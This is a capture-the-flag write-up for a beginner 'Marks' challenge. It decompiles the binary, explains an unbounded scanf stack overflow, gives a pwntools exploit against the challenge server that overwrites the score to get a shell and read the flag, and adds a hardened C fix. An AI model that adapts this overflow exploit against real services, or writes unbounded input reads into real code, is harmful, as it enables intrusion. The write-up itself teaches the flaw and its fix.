Tags: bufferoverflow 

# Marks

We were given a [binary](https://gr007.tech/writeups/2023/backdoor/beginner/marks/chal) that is supposed to show us our marks given our name and roll number. Let's load it into Ghidra:

```c
undefined8 main(void)

{
  int r;
  time_t tVar1;
  long in_FS_OFFSET;
  undefined name [32];
  char buf [64];
  int roll;
  uint m;
  long local_10;

  local_10 = *(in_FS_OFFSET + 0x28);
  tVar1 = time(0x0);
  srand(tVar1);
  puts("Enter your details to view your marks ...");
  printf("Roll Number : ");
  __isoc99_scanf("%d",&roll);
  printf("Name : ");
  __isoc99_scanf("%s",name);
  puts("Please Wait ...\n");
  usleep(1000000);
  r = rand();
  m = r % 75;
  printf("You got %d marks out of 100\n",m);
  puts("Any Comments ?");
  __isoc99_scanf("%s",buf);
  puts("Thanks !");
  if (m == 100) {
    puts("Cool ! Here is your shell !");
    system("/bin/sh");
  }
  else {
    puts("Next time get 100/100 marks for shell :)");
  }
  if (local_10 != *(in_FS_OFFSET + 0x28)) {
    /* WARNING: Subroutine does not return */
    __stack_chk_fail();
  }
  return 0;
}
```

The goal here is to get 100 marks, but as the decompile shows, `m = r % 75` caps the score at 74, so the `m == 100` branch can never be reached through normal input. The comment prompt, however, reads with `scanf("%s", buf)`, which places no limit on how much is written into the 64-byte `buf`, so a long comment overflows into the locals that follow it, including `m`.
Once you know where `m` sits relative to `buf` on the stack (the decompile lists `buf[64]`, then `roll`, then `m`, and the working payload confirms an offset of 68 bytes), it is pretty easy to write an exploit that pads to that offset and overwrites `m` with 100; `roll` is never used after it is read, so clobbering it on the way does no harm.
Here is my solution:

```python
#!/usr/bin/env python

from pwn import *

context.log_level = "debug"

# p = process("./chal")            # local run against the downloaded binary
p = remote("34.70.212.151", 8004)

p.recv()                           # banner + "Roll Number : "
p.sendline(b"123")                 # any roll number will do
p.recv()                           # "Name : "
p.sendline(b"whoami")              # any name will do
p.recv()                           # "Please Wait ..." (the marks line arrives after the 1 s sleep)
# 64 bytes of buf + 4 bytes of roll = 68 bytes of padding, then 100 lands in m.
# p64 emits 8 bytes: 100 in the 4-byte m, followed by four zero bytes past it.
pay = b"a" * 68 + p64(100)
p.sendline(pay)                    # sent as the "comment"
p.interactive()                    # shell from system("/bin/sh")
p.close()
```

```sh
backdoor/beginner/marks on  master [!?] via ? v3.11.6
❯ ./sol.py
[+] Starting local process './chal' argv=[b'./chal'] : pid 118111
[DEBUG] Received 0x38 bytes:
b'Enter your details to view your marks ...\n'
b'Roll Number : '
[DEBUG] Sent 0x4 bytes:
b'123\n'
[DEBUG] Received 0x7 bytes:
b'Name : '
[DEBUG] Sent 0x7 bytes:
b'whoami\n'
[DEBUG] Received 0x11 bytes:
b'Please Wait ...\n'
b'\n'
[DEBUG] Sent 0x4d bytes:
00000000 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 │aaaa│aaaa│aaaa│aaaa│
*
00000040 61 61 61 61 64 00 00 00 00 00 00 00 0a │aaaa│d···│····│·│
0000004d
[*] Switching to interactive mode
[DEBUG] Received 0x50 bytes:
b'You got 21 marks out of 100\n'
b'Any Comments ?\n'
b'Thanks !\n'
b'Cool ! Here is your shell !\n'
You got 21 marks out of 100
Any Comments ?
Thanks !
Cool ! Here is your shell !
$ ls
[DEBUG] Sent 0x3 bytes:
b'ls\n'
[DEBUG] Received 0x16 bytes:
b'chal flag.txt\n'
chal flag.txt
$ cat flag.txt
[DEBUG] Sent 0xd bytes:
b'cat flag.txt\n'
[DEBUG] Received 0x25 bytes:
b'flag{Y0u_ju57_0v3rfl0wed_y0ur_m4rk5}\n'
flag{Y0u_ju57_0v3rfl0wed_y0ur_m4rk5}
```

flag: `flag{Y0u_ju57_0v3rfl0wed_y0ur_m4rk5}`
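The fix for the bug above is to give `scanf` a width so it can never write past the end of `buf`. The following is an added example (not part of the original writeup or the challenge binary) that shows the bounded read beside a constructed model of the locals after `buf`, so you can see that an oversized comment is truncated and `roll` and `m` keep their values; `marks_frame`, `read_result`, `simulate_comment` and the starting values 123 and 21 are assumptions made for the demonstration.

```c
/* Hardened replacement for the comment read in the "marks" binary.
 * scanf("%s", buf) has no width, so a comment longer than 63 bytes
 * runs over the locals that follow buf. Here the width is derived
 * from the buffer size, so at most sizeof(buf)-1 bytes are stored
 * and the result is always NUL-terminated. Added example, not the
 * challenge code; the frame layout below is a constructed model. */
#include <stdio.h>
#include <string.h>

/* main()'s locals in the order the decompile lists them. */
struct marks_frame { char buf[64]; int roll; unsigned int m; };

struct read_result {
    int stored;        /* characters kept from the comment, -1 on error */
    int roll;          /* roll after the read (constructed start: 123) */
    unsigned int m;    /* marks after the read (constructed start: 21) */
};

/* Parse one token from src into dst, storing at most dstlen-1 chars
 * plus the terminator; same idea as scanf("%63s", buf) at the prompt. */
int read_token_bounded(const char *src, char *dst, size_t dstlen) {
    char fmt[16];
    if (dstlen < 2) return -1;
    snprintf(fmt, sizeof fmt, "%%%zus", dstlen - 1); /* "%63s" for 64 */
    if (sscanf(src, fmt, dst) != 1) return -1;
    return (int)strlen(dst);
}

/* Feed comment_len 'a' characters (max 255) through the bounded read
 * and report what the fields next to buf look like afterwards. */
struct read_result simulate_comment(size_t comment_len) {
    struct read_result res = { -1, 0, 0 };
    struct marks_frame f = { {0}, 123, 21 };
    char comment[256];
    if (comment_len == 0 || comment_len > sizeof comment - 1) return res;
    memset(comment, 'a', comment_len);
    comment[comment_len] = '\0';
    res.stored = read_token_bounded(comment, f.buf, sizeof f.buf);
    res.roll = f.roll;
    res.m = f.m;
    return res;
}

int main(void) {
    struct read_result r = simulate_comment(76);
    printf("stored=%d roll=%d m=%u\n", r.stored, r.roll, r.m);
    return 0;
}
```

With the 76-byte input the exploit used, only 63 characters are kept and `m` stays at its starting value; `fgets(buf, sizeof buf, stdin)` is the other common way to get the same bound.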

Original writeup (https://gr007.tech/writeups/2023/backdoor/index.html#marks).